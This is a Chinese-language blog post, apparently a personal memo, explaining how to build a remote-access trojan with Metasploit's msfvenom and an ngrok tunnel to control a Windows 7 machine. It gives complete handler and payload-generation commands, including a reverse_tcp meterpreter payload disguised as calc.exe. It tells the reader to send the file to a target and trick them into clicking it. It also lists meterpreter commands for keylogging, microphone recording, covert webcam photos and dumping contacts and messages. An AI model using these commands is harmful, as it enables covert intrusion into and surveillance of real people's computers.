banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban
tg_channel

msf配合ngrok遠控基礎

本文於 2019-03-19 創作,原標題為 "msf 生成遠控木馬及免殺初探"
2019-12-27 重寫,刪除了包括安卓的部分,只測試 win7 遠控的效果


介紹#

遠控也就是遠程控制,是通過使用者點擊我們準備好的遠控木馬達到控制使用者電腦的效果

基礎材料:

  • Kali 2019.4
  • Win7 SP1
  • ngrok 免費伺服器一台

此外,ngrok 不是唯一遠控伺服器端,你的 kali 布置在外網就不用中間商,或者你也可以自己搭建類似的內網穿透伺服器

本文只是基礎教程,做備忘錄用

過程#

在 msf 中#

直接快速後臺監聽

handler -H 192.168.2.6 -P 8080 -p windows/x64/meterpreter/reverse_tcp

image

可使用jobs

命令查看後臺任務,或者按照正常流程來:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.2.6(本地kali的ip)
set LPORT 8080(本地監聽的端口)
set ExitOnSession false(防止假session)
exploit -j -z(-j為後臺任務,-z為持續監聽)

image

在 ngrok 中#

官網註冊並開通一個免費隧道

image

ngrok 的端口可以隨便填一個大於 1024 的就行,這個填了不能修改

本地的 ip 和端口就是上面設置的 kali 本機的 ip 和端口,後期是可以修改的

申請成功後在 kali 本機上下載 ngrok 的客戶端

解壓後在文件夾內新開一個終端,使用命令:

./sunny clientid 你的隧道id

就可以開始監聽了:

image

ngrok 的基礎操作在以前的文章:《WinRAR 目錄穿越漏洞 - CVE-2018-20250 復現》也有寫過

生成木馬的部分#

監聽部分完成了就可以開始生成木馬傳給目標主機了

在終端中輸入以下命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ngrok免費伺服器地址(不包括前面的協議) LPORT=ngrok申請時填的端口 -f exe -o calc.exe

就可以生成一個最基礎的,無免殺的遠控木馬:

image

將這個木馬傳給目標主機並誘騙點擊,在 msf 中則可以獲取到 meterpreter 會話:

image

可能會不穩定,這就取決於網絡連接狀況和免殺效果了,現在的 payload 是一定會被 360 和火絨攔截的

附上meterpreter的常用操作命令:

命令功能
keyscan_start開始鍵盤記錄
keyscan_stop結束鍵盤記錄
keyscan_dump下載鍵盤記錄
record_mic錄制聲音(如果目標主機上有話筒的話)
screenshot截屏
webcam_chat查看攝像頭接口
webcam_list查看攝像頭列表
webcam_stream開啟攝像頭
webcam_snap隱秘拍照功能 -i num 指定開啟哪個攝像頭
run vnc開啟遠程桌面
dump_contacts導出電話號碼
dump_sms導出信息
可以輸入?查看更多命令

本文完。

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。